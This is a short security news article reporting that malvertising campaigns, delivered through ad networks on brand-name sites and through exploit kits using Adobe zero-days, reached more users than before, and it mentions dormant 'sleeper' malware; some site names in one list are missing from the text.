Malvertising campaigns have reached more users than ever

Malvertising (from “malicious advertising”) is the use of online advertising to spread malware. Malvertising involves injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages.

Malvertising campaigns have reached more users than ever before, reported security firm Invincea yesterday, with many brand-name websites affected -- including CBS Sports, Yahoo and eBay in the UK, Livestrong, Perez Hilton, Glenn Beck's and the Drudge Report.

The company monitors over 2 million endpoints for suspicious activity. Not only is there more malvertising than before, from more high-profile sites, but most of the malware was new to antivirus vendors.

The reason is that advertising companies have been coming down hard on clickfraud, and will blacklist machines when they spot them. That makes the machines useless for clickfraud, so the fraudsters move on to something else.

Keeping patches up to date and avoiding suspicious sites aren't effective strategies against these guys. Not only do they go after brand-name, popular websites, but they are also using zero-day exploits.

"Most of the malvertising that we saw in June appears to be delivered by an exploit kit using the latest Adobe zero day. Adobe released a patch last week for June's zero days,  but the attackers have already found three new zero days, and have already updated their exploit kits."

The specific websites serving up the malware included,,,, eBay UK, Verizon FiOS homepage,, and Glenn Beck’s

The websites themselves were not hacked and, for the most part, the publishers were unaware of the malicious activity,  as the criminals got in through the advertising networks.

However, there were also other websites that were attacked directly, mostly as a result of known flaws in Wordpress themes and plugins, and were used to deliver malware as well.

Another tactic that is becoming more common with attackers is that of "sleeper" malware, which lies dormant after download for 14 hours or longer, in order to evade network sandboxes looking for suspicious activity.


article originally appeared: